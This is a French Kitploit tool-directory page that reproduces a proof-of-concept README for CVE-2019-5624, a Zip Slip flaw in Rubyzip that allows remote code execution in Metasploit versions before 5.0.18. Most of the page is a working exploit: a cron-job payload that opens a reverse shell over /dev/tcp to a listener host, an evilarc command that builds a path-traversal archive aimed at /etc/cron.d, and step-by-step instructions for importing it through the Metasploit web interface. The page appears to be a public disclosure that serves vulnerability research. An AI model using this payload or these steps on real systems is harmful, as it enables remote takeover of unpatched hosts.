Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-5624 — Une preuve de concept pour la vulnérabilité CVE-2019-5624 de Metasploit (exécution de code à distance via la gestion non sécurisée des ZIP dans Rubyzip) | Kitploit
Outils/GitHubGitHub/voidsec/cve-2019-5624
Frameworks d'ExploitationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubvoidsec/cve-2019-5624

CVE-2019-5624

Une preuve de concept pour la vulnérabilité CVE-2019-5624 de Metasploit (exécution de code à distance via la gestion non sécurisée des ZIP dans Rubyzip)

Voir le dépôt
1353il y a 7 ansPas encore vérifié
Site web

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-5624

Une preuve de concept pour la vulnérabilité CVE-2019-5624 de Metasploit (gestion insecure de ZIP par Rubyzip conduisant à une exécution de code à distance)

Introduction

En février 2019, j'ai trouvé une nouvelle vulnérabilité dans la bibliothèque Rubyzip. Elle permet à un attaquant d'exploiter une gestion insecure de ZIP (Zip Slip) entraînant une exécution de commandes à distance.

Cette vulnérabilité a été exploitée pour cibler toutes les versions de Metasploit antérieures à 5.0.18 Metasploit Wrap-Up.

J'ai rédigé un article de blog détaillé expliquant la vulnérabilité.

Preuve de concept

  • Créez un fichier avec le contenu suivant :
root@kitploit:~
* * * * * root /bin/bash -c "exec /bin/bash0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
  • Générez l'archive ZIP avec la charge utile de traversée de chemin :
root@kitploit:~
python evilarc.py exploit --os unix -p etc/cron.d/
  • Ajoutez un espace de travail MSF valide au fichier ZIP (afin que MSF l'extraye, sinon il refusera de traiter l'archive ZIP)
  • Configurez deux écouteurs, un sur le port 4444 et l'autre sur le port 4445 (celui sur le port 4445 recevra le shell inversé)
  • Connectez-vous à l'interface web de MSF
  • Créez un nouveau « Projet »
  • Sélectionnez « Import », « From file », choisissez le fichier ZIP malveillant et enfin cliquez sur le bouton « Import »
  • Attendez que le processus d'importation se termine
  • Profitez de votre shell inversé
  • Vidéo

    Télécharger l’outil